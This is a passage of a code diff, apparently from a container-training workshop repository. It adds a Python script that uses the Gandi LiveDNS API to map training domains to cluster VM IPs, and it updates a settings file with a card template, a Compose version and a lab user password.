echo("Disconnected from server. Try to reload this page?");
};
ws.onmessage = function(event) {
echo(event.data);
};
</script>

</body>
</html>
prepare-vms/map-dns.py (new executable file, 71 lines)
@@ -0,0 +1,71 @@
#!/usr/bin/env python
"""
There are two ways to use this script:

1. Pass a file name as the 1st argument, and a tag name as the 2nd.
It will load a list of domains from the given file (one per line),
and assign them to the clusters corresponding to that tag.
There should be more domains than clusters.
Example: ./map-dns.py domains.txt 2020-08-15-jp

2. Pass a domain as the 1st argument, and IP addresses after it.
It will configure the domain with the listed IP addresses.
Example: ./map-dns.py open-duck.site 1.2.3.4 2.3.4.5 3.4.5.6

In both cases, the domains should be configured to use Gandi LiveDNS.
"""
import os
import requests
import sys
import yaml

# This can be tweaked if necessary.
config_file = os.path.join(
os.environ["HOME"], ".config/gandi/config.yaml")
apiurl = "https://dns.api.gandi.net/api/v5/domains"
apikey = yaml.safe_load(open(config_file))["apirest"]["key"]

# Figure out if we're called for a bunch of domains, or just one.
domain_or_domain_file = sys.argv[1]
if os.path.isfile(domain_or_domain_file):
domains = open(domain_or_domain_file).read().split()
domains = [ d for d in domains if not d.startswith('#') ]
tag = sys.argv[2]
ips = open(f"tags/{tag}/ips.txt").read().split()
settings_file = f"tags/{tag}/settings.yaml"
clustersize = yaml.safe_load(open(settings_file))["clustersize"]
else:
domains = [domain_or_domain_file]
ips = sys.argv[2:]
clustersize = len(ips)

# Now, do the work.
while domains and ips:
domain = domains[0]
domains = domains[1:]
cluster = ips[:clustersize]
ips = ips[clustersize:]
print(f"{domain} => {cluster}")
zone = ""
node = 0
for ip in cluster:
node += 1
zone += f"@ 300 IN A {ip}\n"
zone += f"* 300 IN A {ip}\n"
zone += f"node{node} 300 IN A {ip}\n"
r = requests.put(
f"{apiurl}/{domain}/records",
headers={"x-api-key": apikey},
data=zone)
print(r.text)

#r = requests.get(
# f"{apiurl}/{domain}/records",
# headers={"x-api-key": apikey},
# )

if domains:
print(f"Good, we have {len(domains)} domains left.")

if ips:
print(f"Crap, we have {len(ips)} IP addresses left.")
@@ -1,26 +1,23 @@
# Number of VMs per cluster
clustersize: 1

# The hostname of each node will be clusterprefix + a number
clusterprefix: dmuc

# Jinja2 template to use to generate ready-to-cut cards
-cards_template: enix.html
+cards_template: cards.html

# Use "Letter" in the US, and "A4" everywhere else
paper_size: A4

# Feel free to reduce this if your printer can handle it
paper_margin: 0.2in

# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
# If you print (or generate a PDF) using ips.html, they will be ignored.
# (The equivalent parameters must be set from the browser's print dialog.)

# This can be "test" or "stable"
engine_version: stable

# These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
machine_version: 0.14.0

# Password used to connect with the "docker user"
docker_user_password: training

image:
(Some files were not shown because too many files have changed in this diff.)